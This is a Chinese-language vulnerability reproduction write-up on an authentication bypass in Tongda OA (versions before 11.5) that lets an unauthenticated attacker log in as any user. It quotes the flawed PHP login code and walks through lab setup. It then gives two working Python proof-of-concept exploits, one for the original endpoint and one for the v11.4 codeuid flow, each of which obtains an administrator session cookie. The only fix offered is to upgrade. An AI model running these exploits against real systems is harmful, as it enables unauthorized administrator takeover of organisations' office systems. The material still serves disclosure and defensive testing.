通達OA任意用戶登錄漏洞, 攻擊者在遠程且未授權的情況下,通過利用此漏洞,可以直接以任意用戶身份登錄到系統。
影響版本
版本 < v11.5 (截至目前最新版為11.5)
其中,v11.4版本添加了校驗
漏洞原理
logincheck_code.php文件
<?php
include_once "inc/session.php";
session_start();
ob_start();
include_once "inc/conn.php";
include_once "inc/td_core.php";
include_once "inc/utility.php";
include_once "inc/utility_cache.php";
include_once "inc/TRedis/TRedis.php";
$redis = TRedis::redis();
$UID = intval($_POST["UID"]);
$msg = "";
$PARA_ARRAY = get_sys_para("SEC_PASS_FLAG,SEC_PASS_TIME,SEC_RETRY_BAN,SEC_RETRY_TIMES,SEC_BAN_TIME,SEC_USER_MEM,SEC_KEY_USER,LOGIN_KEY,SEC_ON_STATUS,SEC_INIT_PASS,LOGIN_SECURE_KEY,LOGIN_USE_DOMAIN,DOMAIN_SYNC_CONFIG,ONE_USER_MUL_LOGIN,IS_CPDA_BYIP,USE_DISCUZ,OA_URL,WEBROOT,DEFAULT_ATTACH_PATH,MOBILE_PC_OPTION,TD_UNIQID");
while (list($PARA_NAME, $PARA_VALUE) = each($PARA_ARRAY)) {
$PARA_NAME = $PARA_VALUE;
}
$query = "SELECT * from USER where UID='$UID'";
$cursor = exequery(TD::conn(), $query);
..........
if ($ROW = mysql_fetch_array($cursor)) {
$SECURE_KEY_SN = $ROW["SECURE_KEY_SN"];
$_SESSION["LOGIN_USER_NAME"] = $LOGIN_USER_NAME;
$_SESSION["LOGIN_USER_PRIV"] = $LOGIN_USER_PRIV;
$_SESSION["LOGIN_USER_PRIV_OTHER"] = $LOGIN_USER_PRIV_OTHER;
$_SESSION["LOGIN_SYS_ADMIN"] = (($LOGIN_USER_PRIV == "1") || find_id($LOGIN_USER_PRIV_OTHER, "1") ? 1 : 0);
$_SESSION["LOGIN_DEPT_ID"] = $LOGIN_DEPT_ID;
$_SESSION["LOGIN_DEPT_ID_OTHER"] = $LOGIN_DEPT_ID_OTHER;
$_SESSION["LOGIN_AVATAR"] = $LOGIN_AVATAR;
$_SESSION["LOGIN_THEME"] = $LOGIN_THEME;
$_SESSION["LOGIN_FUNC_STR"] = $LOGIN_FUNC_STR;
$_SESSION["LOGIN_NOT_VIEW_USER"] = $LOGIN_NOT_VIEW_USER;
$_SESSION["LOGIN_ANOTHER"] = $LOGIN_ANOTHER;
$_SESSION["LOGIN_DEPT_ID_JUNIOR"] = $LOGIN_DEPT_ID_JUNIOR;
$_SESSION["LOGIN_CLIENT"] = $LOGIN_CLIENT;
$_SESSION["LOGIN_USER_SEX"] = $LOGIN_USER_SEX;
第12行獲取了UID參數,然后直接進行了20行的sql語句查詢,沒有對權限進行驗證處理,在第180-196行就保存到了SESSION中
所以我們直接請求 logincheck_code.php 就能生成cookie儲存到session中獲得權限
環境搭建
下載有漏洞版本按照提示安裝即可,訪問本地localhost或者127.0.0.1出現以下頁面為安裝成功,默認admin用戶無密碼
復現
像我上面那樣post請求可以,用poc獲取也可以
替換cookie后訪問/general/index.php即可進入管理員賬戶
PoC
import requests
import json
headers={}
def getV11Session(url):
checkUrl = url+'/general/login_code.php'
print(checkUrl)
try:
headers["User-Agent"] = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)"
getSessUrl = url+'/logincheck_code.php'
res = requests.post(
getSessUrl, data={ 'UID': int(1)},headers=headers)
print('[+]Get Available COOKIE:'+res.headers['Set-Cookie'])
except:
print('[-]Something Wrong With '+url)
if __name__ == "__main__":
getV11Session("http://192.168.223.134/")
V11.4
這個版本在logincheck_code.php中加入了驗證,增加了一個codeuid,獲取codeuid添加到UID后步驟和前面的一樣,這里我沒有v11.4的環境,直接放poc吧
import json
import requests
def getSession(url):
vulUrl = url+'/ispirit/login_code.php'
res = requests.get(vulUrl)
codeuid = json.loads(res.text)['codeuid']
print(codeuid)
confirmUrl = url + '/general/login_code_scan.php'
data = {
'codeuid':codeuid,
'uid': int(1),
'source': 'pc',
'type': 'confirm',
'username': 'admin',
}
res = requests.post(confirmUrl,data=data)
status = json.loads(res.text)['status']
print(status)
if status == str(1):
seesionUrl = url + '/ispirit/login_code_check.php?codeuid='+codeuid
res = requests.get(seesionUrl)
print('[*]cookie:'+res.headers['Set-Cookie'])
else:
print('[-]failed')
if __name__ == "__main__":
getSession('目標url')
修復建議
升級到最新版
這里我試了一下添加訪問控制,結果還是可以訪問,還是升級最新版吧
